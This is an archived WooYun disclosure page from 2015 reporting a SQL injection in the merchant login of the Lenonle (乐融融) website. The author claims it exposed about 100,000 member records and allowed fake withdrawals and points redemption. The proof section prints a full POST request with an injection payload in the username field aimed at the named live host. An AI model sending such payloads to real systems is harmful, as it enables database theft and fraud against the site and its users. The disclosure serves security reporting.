当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139715

漏洞标题:乐融融SQL注射(泄露10W注册会员信息/伪造金额提现/任意兑换积分商城物品)

相关厂商:杭州乐其儿网络技术有限公司

漏洞作者: 路人甲

提交时间:2015-09-08 13:58

修复时间:2015-10-23 14:00

公开时间:2015-10-23 14:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

关于乐融融
●“乐融融”的由来:
乐融融网(电脑版 lenonle.com或手机版 m.lenonle.com)由杭州乐其儿网络技术有限公司开发经营。
“乐融融”的网名首先来自于创始人对于网站价值定位:即构建一个新生代的旨在为亿万民众提供服务行业产品网上自由交易的开放平台。而服务业得以产生和不断发展的内在动力在于人们对于“快乐”的精神追求和满足。通过服务产品的提供和消费,实现一个充满快乐、人与人之间融洽相处的富足的人类社会新时代。乐融融网的存在和发展,正是为加快实现这一人类社会发展目标贡献绵薄之力。
2011年6月,杭州乐其儿网络技术有限公司注册成立于千百年来被誉为“人间天堂”的中国最美城市――杭州。“乐融融”之于“人间天堂”,“人间天堂”之于人类的终极精神寄宿,三者之间,实为不可分割的整体。
●乐融融网的商业模式:
通俗的说,乐融融网的商业模式是:BO2O(Bidding Online, from online to Offline )模式,为国内首创。BO2O商业模式能给用户带来全新的省时、省钱、省心的服务业非标准化产品购买体验;同时,最大限度的帮助服务提供商以最快速度最低成本清除服务产品库存,帮助其经营边际成本降到最低。是不可多得的解决非标准化服务产品网上交易的先进商业模式。
●乐融融网核心价值观:
唯有能有效降低交易双方交易成本、提供人们良好交易体验及高质量服务体验的网站才是符合市场需求的好网站;唯有谋求作为需求方的消费者、服务供应商和交易平台三方价值共同不断提升,交易平台才能长存!
●乐融融网的使命:
以低成本促进中国服务行业营销、管理的转型升级的同时,带给无数消费者会员以“自主”、“快捷”、“低成本”的选择服务、购买服务和享受高性价比服务的体验,提升人们的快乐幸福感。

详细说明:

在商户登录处POST注入,没想到主站和商户用一个库,全部数据搞定
测试了个户,可以提现和积分兑换

漏洞证明:

POST /login.aspx HTTP/1.1
Host: sps.lenonle.com
Content-Length: 3543
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://sps.lenonle.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://sps.lenonle.com/login.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=fnqeoab5hsy5bp55xcwqzm55; Hm_lvt_f808693f80aab1f05cf0431944db9326=1441610778; Hm_lpvt_f808693f80aab1f05cf0431944db9326=1441610807
__VIEWSTATE=ZVMfuKTfXRdvwVfDVCegQVxih%2BfD29TbXIPlXt2LgcFjU5eEyQ%2BxzgW6eyZw1TmZox6%2BliXgCjnrLucjB87SL7U4fWM2Q2iI8S9%2BGgCAFc0kLN47kArmk8ZnCCYWtjFjA02VMEYrF7e5rPLsKove5rFMz0pVbhC1p0gLJbmrJP3DUCEsQQdHLheaPURSWl2k6fZ3qy%2Fua4BHwxWupXXX9mAxBmAPsJMPVXvWoPlRv0nYEZFpO5bjpOGwmpCmJIufKrBT%2FF8KsXi3vYKj9qfdHQcCoblwPDUS5h1O2NaOCPYkWNI87BY3wAh6Z%2F3RvKpvQ8kj%2BnmUr8FOE2BXFX5w7NJgCwlUXq8VBzhkuvStBN4V5acQ4ZSh%2FIGsc%2BXYJVbORDflTE3FK7cjg1FgMiMGjhhRioOK0EsZUL99fanT7OTVJJeWZPIjSkEG8zx1Bx3GUBBQdXo%2BOH7buHDm5Om8gv9i%2BvgCpGt6b3Wne4LnABy08FpauLUmOYEkHBV3XsvMirWz3ziwOk8fVxBCgJHFLxvgUEiC0Iv%2FRVk3CJjnBJ1lwKQQNfmuM5hYuLv79LNM6rZvbvHTZBIf4qQPvTTt9AlsmiqtRKHj2Fd5HwniOMpz2f4mIseF7PobOJ56528h%2FWTJcu0KoqF51VnOER05CMMrvVRFGhRewHtUCxFA1lO55FLqe0EFMAR%2BtTCQeRoxULEBJvpavTwopdd0aGKM2KBDMe5NH8eyN%2FONpNMOpzAzlX6PDnXFJjblFpP3BH997pZPnsl7TumRQUUUj2oD613QGiz69%2B078jLajH3d1wbJfzQ0LouSFp3Tjn844jbsVOA8Ha8FlpICXDYfx7Pz%2Fe7ccSqSDTJWzusFhXH9Q%2BzWAChIDL3rOVJJ2RGZfDM0c%2FXATBcHsdMx2vlhW6HDfojemVZuRqWLFLHWrUuaI5JiN4%2B37ccakHf%2B3Fs%2B%2BEk27gzN5hhEajCRPc%2FQJYABdARxeEkNdefocbSqLQ3QcprjtZlG97gQo2IyToy2a1%2BUaY0szsAfA66rqHltC7L5fsiaFcOWujYyoHiZUffGIYJpX%2FVinBhALBj5ntkjE%2B%2BqHChEXCy8Ly9HBOm8kSfSdln4iaotpbsS90O4sgFhBgycm1H55J%2BJ4YLw8Y7CJphy9tAAQCpMRYSqE5B4qfMcbDGQgyXk3IV%2BRDQg0WyQSx7RxzxClVJ0e1KPRFGs83o6kS2%2By4WSz8nKukn%2BiulSJutkKrUwdiSddU81ZhxBboQwGZWjSs1%2FADociK9xFqE4MXfMx2ip05h7LGAUqVxdUItuqqJ2IfBKgAUs3IHGAf6WqYDdxyQJaG2WG72S3OWclFwwKFgdr9bs2%2BSBSSvnXiGYWLp%2FubgQOW%2B5HuQkUmGCP7HXlUSiyLow%2BOC6xJxwja4B5bbOXjiDMERC2AyCsPYOKN1lSoXKBb6WzIFc%2BcjhUyYe3CLN9gDhRzBWKOJM5Fj0RUcCXRSFhUGqwYQFHpvHVofSqfby87YwNFQAOaDp%2B65VVueP00BDR192NGqQJwdjdraTVzMjBQI3C5vi0RuD%2BIqbhxLvPULyuQoy0mnjVSrAi1no9jPafSbUBXi0AWZOvhsEzkuaAzZZ2O9bMBKLQsKPLxSZk7kqG95KIAnaWC0QDHXBbSrP2PfKo%2F1BI238%2BPagFfvkknWVr37eBlrzD0Ef3tPpahehxkDgHQ1SxWm6S2QBxJkwweAgDdd0t7eJ3wMdOK%2F13pvVPJSCbhmqYHoUBvZKaLr3lPJ8Ap3M8vhlBBxjIIelYh73AQqPr009GaNzvAP%2FPithkKn87nSwa7JHyDApAenRaYYObybRF1zcChQ028QQfAih%2F7hiYBeyos2BKUKD1Xqp%2F4KmKIfs7LB%2F17Put3NoomnRETYJDOkEYbY8Hqo%2FlRveXrI%2FjkRvfeDVzsq1445V0A%2BGAKG0%2BGslege2upwOg2c0t71gwGjgwsK13N%2BwHYJT8xzEi8UIyXZ1EBZpcvXVXw%2FpwQz2IhAF7e6DHRpIqi6pxqPyN8z6KWEBoJZltkfnnW4DMADZJ6UB9YTaeaqdvWLDuFO8OtP%2Bi0UM7QIzxVlzgrLp%2F7x0lRt2c1IIWnnK5G2snnXmUSHjAPQoIYURvUFPqvYdVT9%2B8AvMuNUzH5TwNgaRgdrrCuptx6bRBisSv3gwKDyTckQTIQZBJcPg07PFObQuBOGtuHkL9YQIVZWNVXfMMR71BOu1ABrdJf4sR9VfXH3hX8EWiR75SjNYxaZcaD8a9nIb01uqemUPCPpaAd%2Fgduo5kqypMo5ddhUx1XDx5GYG2ZP56mOGl8KnVJ1LUaeJoag%2FiXQXz8G8c06T7T6SlsG2JHBINj1hELA%2BqkXvqHqo9IXrgM3teTvfU46m%2FRPmZXguft3KEX%2B3YZiYRXtt0CkgO97FIKZwPTvqvNqkobsgpLBf1LYQ6P3c1nePSw6LmuaGlYTr3gFe9Rkg0uSKynEbbSJAevNp5vIR75FxzfjXRmq25u2ZF19ZgjkOUoeFRNqxU5VZmOq6qVN4jL3SB7cHd7azXpfDMkiZV0sK11Pv5AotENz1vEtwuKg5OXf4vRWsFIYPUJIZiQ4H8HA50bgJEpV4yF7aKIxeLcLCWzZCTIpzpJKznMcpH0HBsoHb4%2Bk9PwGlcbSAzXGxIxIeXy1V%2BAvHs15vcXskTDyvbAoTElz%2BYR%2BaJpCiim57tKG9G9xbNHRqQwvD09V7p%2BphrkDyz%2B7bJ5kMHRN20wbvkyXc8fDM7ASBkfJvhUxm0%2BXWxxCKbN07FCVZF9P7ybLLVYDxx6zaq%2Fd4AJVqT4M0f%2BzdW%2BkVfJu8dX%2F7I0wOGZXnSaiGuR0DLHnchsp0JwIEG%2BE2LqqlSXhlcZJwWJZLL0%2BAcPLnZnD3EvzLrHGgqM5nG7rbm7hUIUXLFhZvsnD98eQPL5ZKTvitacJyZRFzwwruSAd%2B4pmgdjgNkWDhemd3LH3geD4Tdz9Cz7WCRtegXjr3R9sAH0Np%2F49yIm%2BdkOme5iXewoC9wB5Vgh%2B4yE7mxC8PXIFmoHdiPIR5ChlNI84o9IhIcIsjWbqI%2BLZOHpAW31tYPtHuDzSl&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=pgVuf0WO3HlpbHsVXyrY9jOM%2BdhcWaFOLbFEuqlyFFgxjLQN364BQ4dWS4rIj7dDfgZ4ISaN5uYeJ8BSPssMPxyJT9yoABPH0L1QTmJ0ZBXBh3TaOTiC%2F6LkbSATURq4Hovi2uThDjFjeDxD&u_name=a%27+and+user%3E0--&u_pwd=aaaa&txtChkcode=w1px&imagelogin.x=86&imagelogin.y=13
+-------------------------------------------+

POST数据包

搜狗截图15年09月08日1055_1.png

1111.png

meber.png

搜狗截图15年09月07日1640_10.png

10W.png

5555.png

125445855.png

judy.png

469.png

469手机号.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)